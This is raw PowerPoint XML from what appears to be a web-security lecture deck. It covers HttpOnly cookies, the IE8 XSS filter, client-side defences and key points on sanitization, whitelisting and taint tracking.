              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Set-cookie:	NAME=VALUE ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3810000"/>
            <a:ext cx="8056563" cy="2741613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  Cookie sent over HTTP(s),  but not accessible to scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> Also blocks access from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>  Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t> …  but does not stop most other risks of XSS bugs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57358" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7443788" y="914400"/>
            <a:ext cx="1593850" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(not Safari?)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55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IE XSS Filter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1562100"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What can you do at the client?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58372" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3135313"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58373" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5883275" y="4903788"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58374" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5945188" y="2438400"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58375" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="2667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58376" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4427538"/>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58377" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2454275"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58378" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="44196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58379" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2427288" y="2836863"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58380" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2655888" y="4495800"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58381" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3430588" y="46037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58382" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2700338" y="50546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58383" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="3095625" y="42386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58384" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4857750"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58385" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2579688" y="3427413"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58386" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3227388" y="32829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58387" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="35814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58388" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2409825"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58389" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="165100" y="6443663"/>
            <a:ext cx="8826500" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://blogs.msdn.com/ie/archive/2008/07/01/ie8-security-part-iv-the-xss-filter.aspx </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z="3200" smtClean="0"/>
              <a:t>Complex problems in social network sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1828800"/>
            <a:ext cx="5105400" cy="4114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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 4" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\ZR24IX3M\MCj04348450000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2133600"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Can 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554913" y="1828800"/>
            <a:ext cx="1284287" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="can">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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 9" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\DCKGN2VX\MCj04352420000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132513" y="4572000"/>
            <a:ext cx="1270000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="5080000"/>
            <a:ext cx="1436688" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-supplied application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Down Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6819900" y="2552700"/>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Down Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8578543">
            <a:off x="6375400" y="3756025"/>
            <a:ext cx="304800" cy="69373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Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4686300" y="2933700"/>
            <a:ext cx="3048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1026" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1143000" y="2133600"/>
          <a:ext cx="3144838" cy="2143125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s485483" name="Acrobat Document" r:id="rId6" imgW="2664000" imgH="2131200" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId6" imgW="2664000" imgH="21312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133600"/>
                        <a:ext cx="314483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Down Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4686300" y="3009900"/>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1200150" y="2933700"/>
            <a:ext cx="1685925" cy="704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1143000" y="2133600"/>
            <a:ext cx="3143250" cy="21526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55123723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Points to remember</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Key concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Whitelisting vs. blacklisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Output encoding vs. input sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Sanitizing before or after storing in database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Dynamic versus static defense techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Good ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Static analysis (e.g. ASP.NET has support for this) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Taint tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Framework support </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Continuous testing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Bad ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Blacklisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Manual sanitization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SQL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Finding vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923"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2011363" y="5029200"/>
            <a:ext cx="2481262" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32771" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="365125" y="4206875"/>
            <a:ext cx="571500" cy="547688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32772" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6765925" y="4022725"/>
            <a:ext cx="1098550" cy="949325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32773" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2378075" y="2378075"/>
            <a:ext cx="1154113" cy="387350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32774" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
